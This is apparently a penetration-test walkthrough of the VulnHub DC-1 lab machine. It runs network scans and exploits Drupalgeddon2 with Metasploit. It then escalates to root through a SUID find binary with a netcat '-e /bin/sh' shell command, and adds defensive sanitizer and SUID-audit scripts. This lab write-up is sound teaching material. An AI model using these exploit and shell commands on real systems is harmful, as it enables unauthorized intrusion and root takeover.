
VulnHub machine series: DC-1

1. Preface

Target machine: https://www.vulnhub.com/entry/dc-1,292/

Filename: DC-1.zip

File size: 733 MB

MD5: D052D37F7C819A2B5488FE2BFF4571D8

SHA1: BDDCADF7E8CFA1FF8BE04E446886EAD50B33761D

DHCP service: Enabled

IP address: Automatically assign

2. Environment setup

Run the virtual machine in VMware with the network adapter set to bridged mode, so the target joins the host's network.

If the target cannot obtain an IP address, see Note 1.

3. Penetration test

3.1 Host discovery

3.1.1 Host discovery with fping

u@u:~$ fping -aqg 192.168.0.0/24
192.168.0.1
192.168.0.104
192.168.0.107
192.168.0.119
192.168.0.109
192.168.0.199

3.1.2 Host discovery with nmap

u@u:~$ nmap -sP 192.168.0.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 17:39 CST
Nmap scan report for _gateway (192.168.0.1)
Host is up (0.0012s latency).
Nmap scan report for 192.168.0.107
Host is up (0.028s latency).
Nmap scan report for 192.168.0.109
Host is up (0.049s latency).
Nmap scan report for 192.168.0.119
Host is up (0.00065s latency).
Nmap scan report for u (192.168.0.199)
Host is up (0.0011s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 13.04 seconds

3.1.3 Host discovery with netdiscover

 Currently scanning: 192.168.205.0/16   |   Screen View: Unique Hosts

 60 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 3600
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.0.1     xx:xx:xx:xx:xx:xx      4     240  
 192.168.0.104   xx:xx:xx:xx:xx:xx     12     720  
 192.168.0.119   xx:xx:xx:xx:xx:xx      9     540  
 192.168.0.107   xx:xx:xx:xx:xx:xx     35    2100  

Compare the discovery results with the target powered on and powered off; the IP that newly appears is the target's IP.

3.2 Port and service scan

nmap -v -A -sS -Pn -T4 -p 1-65535 <ip>

The scan results are as follows:

u@u:~/Desktop$ cat result
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 18:03 CST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating ARP Ping Scan at 18:03
Scanning 192.168.0.119 [1 port]
Completed ARP Ping Scan at 18:03, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:03
Completed Parallel DNS resolution of 1 host. at 18:03, 0.06s elapsed
Initiating SYN Stealth Scan at 18:03
Scanning 192.168.0.119 [65535 ports]
Discovered open port 111/tcp on 192.168.0.119
Discovered open port 22/tcp on 192.168.0.119
Discovered open port 80/tcp on 192.168.0.119
Discovered open port 56922/tcp on 192.168.0.119
Completed SYN Stealth Scan at 18:03, 1.79s elapsed (65535 total ports)
Initiating Service scan at 18:03
Scanning 4 services on 192.168.0.119
Completed Service scan at 18:03, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.119
NSE: Script scanning 192.168.0.119.
Initiating NSE at 18:03
Completed NSE at 18:03, 1.92s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.14s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Nmap scan report for 192.168.0.119
Host is up (0.00038s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37336/udp6  status
|   100024  1          42536/udp   status
|   100024  1          56922/tcp   status
|_  100024  1          58809/tcp6  status
56922/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:B8:E1:00 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Uptime guess: 0.014 days (since Tue Aug  4 17:43:41 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 192.168.0.119

NSE: Script Post-scanning.
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.81 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian)) / Drupal 7
111/tcp   open  rpcbind 2-4 (RPC #100000)
56922/tcp open  status  1 (RPC #100024)

3.3 Web information gathering

u@u:~$ whatweb 192.168.0.119                                                                                                                                  
/usr/lib/ruby/vendor_ruby/target.rb:188: warning: URI.escape is obsolete                  
http://192.168.0.119 [200 OK] Apache[2.2.22],
Content-Language[en],
Country[RESERVED][ZZ],
Drupal, 
HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], 
IP[192.168.0.119], 
JQuery, 
MetaGenerator[Drupal 7 (http://drupal.org)], 
PHP[5.4.45-0+deb7u14], 
PasswordField[pass], 
Script[text/javascript], 
Title[Welcome to Drupal Site | Drupal Site], 
UncommonHeaders[x-generator], 
X-Powered-By[PHP/5.4.45-0+deb7u14]

3.4 Searching for Drupal 7 vulnerabilities

msf5 > search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   1  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   4  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   5  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   6  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index, for example use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf5 > info exploit/unix/webapp/drupal_drupalgeddon2

       Name: Drupal Drupalgeddon 2 Forms API Property Injection
     Module: exploit/unix/webapp/drupal_drupalgeddon2
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2018-03-28

Provided by:
  Jasper Mattsson
  a2u
  Nixawk
  FireFart
  wvu <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic (PHP In-Memory)
  1   Automatic (PHP Dropper)
  2   Automatic (Unix In-Memory)
  3   Automatic (Linux Dropper)
  4   Drupal 7.x (PHP In-Memory)
  5   Drupal 7.x (PHP Dropper)
  6   Drupal 7.x (Unix In-Memory)
  7   Drupal 7.x (Linux Dropper)
  8   Drupal 8.x (PHP In-Memory)
  9   Drupal 8.x (PHP Dropper)
  10  Drupal 8.x (Unix In-Memory)
  11  Drupal 8.x (Linux Dropper)

Check supported:
  Yes

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DUMP_OUTPUT  false            no        Dump payload command output
  PHP_FUNC     passthru         yes       PHP function to execute
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT        80               yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Path to Drupal install
  VHOST                         no        HTTP server virtual host

Payload information:
  Avoid: 3 characters

Description:
  This module exploits a Drupal property injection in the Forms API.
  Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
  vulnerable.

References:
  https://cvedetails.com/cve/CVE-2018-7600/
  https://www.drupal.org/sa-core-2018-002
  https://greysec.net/showthread.php?tid=2912
  https://research.checkpoint.com/uncovering-drupalgeddon-2/
  https://github.com/a2u/CVE-2018-7600
  https://github.com/nixawk/labs/issues/19
  https://github.com/FireFart/CVE-2018-7600

Also known as:
  SA-CORE-2018-002
  Drupalgeddon 2
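
The module description above says the bug is a property injection in the Forms API: keys beginning with '#' are Form API properties, and the SA-CORE-2018-002 fix added a request sanitizer that strips such keys from user input before any form code sees them. The following is an added example written by the editor, not code from this post or from Drupal: it decodes a form body into nested arrays the way PHP builds $_POST, then strips every '#'-prefixed key, reporting what was removed so a defender can log it. The key '#injected' and the sample body are constructed values.

```python
import re
from urllib.parse import parse_qsl

# Added example mirroring the style of the SA-CORE-2018-002 fix (not Drupal's own code):
# '#'-prefixed keys are Form API properties and must never arrive from the client.

def _next_index(node):
    """Next integer key, emulating PHP's $array[] = value append."""
    ints = [k for k in node if isinstance(k, int)]
    return max(ints) + 1 if ints else 0

def php_parse_body(body):
    """Decode a urlencoded body the way PHP builds $_POST:
    'a[b][]=c' becomes {'a': {'b': {0: 'c'}}}."""
    result = {}
    for raw_key, value in parse_qsl(body, keep_blank_values=True):
        head, _, rest = raw_key.partition('[')
        parts = [head] + (re.findall(r'\[([^\]]*)\]', '[' + rest) if rest else [])
        node = result
        for part in parts[:-1]:
            key = _next_index(node) if part == '' else part
            if not isinstance(node.get(key), dict):
                node[key] = {}
            node = node[key]
        node[_next_index(node) if parts[-1] == '' else parts[-1]] = value
    return result

def strip_dangerous_values(data, whitelist=(), stripped=None):
    """Recursively drop every '#'-prefixed key not in the whitelist,
    recording each removed key so the event can be logged."""
    if stripped is None:
        stripped = []
    if isinstance(data, dict):
        for key in list(data):
            if isinstance(key, str) and key.startswith('#') and key not in whitelist:
                del data[key]
                stripped.append(key)
            else:
                data[key], _ = strip_dangerous_values(data[key], whitelist, stripped)
    return data, stripped

def sanitize_request(body, whitelist=()):
    """Decode and sanitize one request body; a non-empty stripped list
    is the signal a defender would alert on."""
    return strip_dangerous_values(php_parse_body(body), whitelist)

if __name__ == "__main__":
    # Constructed sample request: one legitimate field plus one '#' key.
    sample = "name=alice&mail[%23injected][]=x&mail[address]=a%40example.test"
    print(sanitize_request(sample))
```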

3.5 Exploiting the vulnerability with msfconsole

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.0.119
RHOST => 192.168.0.119
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > SET LHOST 192.168.0.199
[-] Unknown command: SET.
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 192.168.0.199
LHOST => 192.168.0.199
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started bind TCP handler against 192.168.0.119:8080
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.0.119:8080) at 2020-08-05 09:15:35 +0800

ls
COPYRIGHT.txt
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt
README.txt
UPGRADE.txt
authorize.php
cron.php
flag1.txt
includes
index.php
install.php
misc
modules
profiles
robots.txt
scripts
sites
themes
update.php
web.config
xmlrpc.php

If the options are set correctly but the exploit keeps failing, try switching to a different payload.

3.6 Privilege escalation

3.6.1 Privilege escalation via SUID find

meterpreter > shell
Process 3454 created.
Channel 4 created.
find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

Here find has the SUID bit set, so the find command can be used to escalate privileges.

cd /tmp
touch a
find a -exec whoami \;
root

Since the target has netcat installed, we can directly run:

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
listening on [any] 5555 ...
u@u:~$ nc 192.168.0.119 5555
whoami
root
python -c "import pty;pty.spawn('/bin/sh')"
# whoami
whoami
root
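
From the defender's side, the lesson of this section is that a single non-standard SUID binary with an -exec or shell-escape feature is a root shell for anyone with a local foothold. The following is an added example written by the editor, not code from this post: it reproduces the walkthrough's find query as a filesystem walk, flags SUID binaries that are known to hand out a shell (a small editor-chosen subset of the public GTFOBins SUID entries, not an exhaustive catalogue), and emits the chmod commands an administrator would run. DC1_SUID is a constructed copy of the list the walkthrough obtained.

```python
import os
import stat

# Added example (editor's code, not from the post). Editor-chosen subset of
# binaries whose SUID bit yields a shell via -exec, an editor or an interpreter.
SHELL_ESCAPE_BINARIES = {
    "find", "xargs", "vim", "vi", "nano", "less", "more", "awk", "env",
    "bash", "sh", "dash", "python", "python2", "python3", "perl", "ruby",
    "cp", "mv", "tee", "nmap", "socat", "tar", "zip",
}

def scan_suid(root="/"):
    """Equivalent of 'find / -user root -perm -4000': root-owned regular
    files with the setuid bit, collected without following symlinks."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                found.append(path)
    return found

def audit_suid(paths):
    """Return the SUID paths whose basename is a known shell-escape binary."""
    return sorted(p for p in paths if os.path.basename(p) in SHELL_ESCAPE_BINARIES)

def remediation(paths):
    """Commands an administrator would run to drop the SUID bit on each flagged file."""
    return ["chmod u-s " + p for p in audit_suid(paths)]

# Constructed copy of the SUID list the walkthrough obtained on DC-1.
DC1_SUID = [
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/ping6", "/bin/umount",
    "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/procmail", "/usr/bin/find", "/usr/sbin/exim4",
    "/usr/lib/pt_chown", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/sbin/mount.nfs",
]

if __name__ == "__main__":
    for line in remediation(DC1_SUID):   # prints: chmod u-s /usr/bin/find
        print(line)
```

On a live host, `remediation(scan_suid())` produces the same review list for the machine it runs on; the stock setuid helpers in the list above (su, passwd, mount and friends) are expected and are deliberately not flagged.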

Notes

[Note 1] https://blog.csdn.net/asstart/article/details/103433065